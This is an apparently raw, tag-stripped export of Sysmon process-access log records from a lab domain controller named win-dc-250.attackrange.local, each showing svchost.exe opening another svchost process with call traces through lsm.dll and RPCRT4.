13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.217{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.201{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 